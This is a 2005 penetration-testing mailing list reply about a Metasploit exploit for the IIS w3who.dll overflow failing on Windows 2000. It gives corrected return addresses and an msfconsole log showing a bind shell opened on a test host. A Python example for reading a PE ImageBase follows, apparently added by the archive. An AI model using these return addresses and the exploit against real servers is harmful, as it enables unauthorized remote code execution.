Penetration Testing mailing list archives

Re: question regarding w3who.dll bug


From: H D Moore <sflist () digitaloffense net>
Date: Sat, 15 Jan 2005 01:56:01 -0600

The return address for Windows 2000 fails because the ImageBase for the 
DLL is different. I forgot to check the base address on 2000 after fixing 
the code to work on Windows XP SP2 :-(

A new module will be posted to metasploit.com shortly. In the meantime, 
just change the return address in the Targets section to one of the 
following:

0x01169f4a (pop eax, pop ebp, ret @w3who.dll w/base 0x01150000)
0x75022ac4 (pop esi, pop ebx, ret @ws2help.dll [Win2k English])
0x750236b1 (pop esi, pop ebx, ret @ws2help.dll [Win2k English])

If you run into any other bugs or reliability problems with the Metasploit 
Framework, *please* drop us an email at msfdev[at]metasploit.com :-)

-HD

---
msf iis_w3who_overflow(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Attempting to exploit target Windows 2000 RESKIT DLL (Win2000)
[*] Sending 8254 bytes to remote host.
[*] Waiting for a response...
[*] Got connection from 192.168.0.100:34885 <-> 192.168.0.237:4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>   


On Friday 14 January 2005 02:49, Martin Bernhard wrote:
Hi,

As one of our clients is running some IIS web servers with w3who.dll on
them, I figured that this would be a good place to start our pen test.
Unfortunately, the exploit in the new release of the Metasploit
Framework did not work on the most important servers (Windows 2000). I
have access to a test system that gives me the opportunity to analyze
the bug in detail, but I can’t figure out what parts in memory are
overwritten. Does anybody know what exactly I have to do to trigger the
bug and analyze it (I’m using ollydbg)?

Any help is much appreciated
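As an added illustration of the ImageBase point in HD's reply (example code written for this archive page, not from the thread, the Metasploit Framework or w3who.dll), here is a small Python reader for a PE image's preferred ImageBase; it uses a constructed minimal header rather than the real DLL, and the offset helper shows that 0x01169f4a is just offset 0x19f4a from the 0x01150000 base quoted above, so the same offset lands at a different absolute address whenever the module is based elsewhere.

```python
import struct

def build_sample_pe(image_base: int, pe32plus: bool = False) -> bytes:
    """Constructed sample: a minimal PE header (NOT a real w3who.dll) whose
    preferred ImageBase is `image_base`; only the fields read below matter."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)  # 64 bytes
    machine = 0x8664 if pe32plus else 0x14C
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 0x60, 0x2102)
    if pe32plus:   # PE32+: Magic 0x20B, 64-bit ImageBase at optional header +0x18
        opt = struct.pack("<H", 0x20B) + b"\0" * 22 + struct.pack("<Q", image_base)
    else:          # PE32:  Magic 0x10B, 32-bit ImageBase at optional header +0x1C
        opt = struct.pack("<H", 0x10B) + b"\0" * 26 + struct.pack("<I", image_base)
    opt += b"\0" * (0x60 - len(opt))
    return dos + b"PE\0\0" + coff + opt

def read_image_base(data: bytes) -> int:
    """Return the preferred load address from a PE image's optional header."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: no MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: no PE signature")
    opt = e_lfanew + 4 + 20  # skip the PE signature and the 20-byte COFF header
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic == 0x10B:
        (base,) = struct.unpack_from("<I", data, opt + 0x1C)
    elif magic == 0x20B:
        (base,) = struct.unpack_from("<Q", data, opt + 0x18)
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    return base

def rva_of(va: int, image_base: int) -> int:
    """Offset of an absolute address from the module base. A hard-coded
    absolute address silently depends on that base: load the same module at a
    different ImageBase and every address shifts by the base difference."""
    if va < image_base:
        raise ValueError("address lies below the module base")
    return va - image_base

if __name__ == "__main__":
    sample = build_sample_pe(0x01150000)
    base = read_image_base(sample)
    print(f"ImageBase {base:#010x}; RVA of 0x01169f4a is {rva_of(0x01169F4A, base):#x}")
```

Pointed at a real file instead of the constructed header, `read_image_base(open(path, "rb").read())` reports the base the linker chose for that build, which is the value to compare when an address taken from one system's copy of a DLL is being checked against another's.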

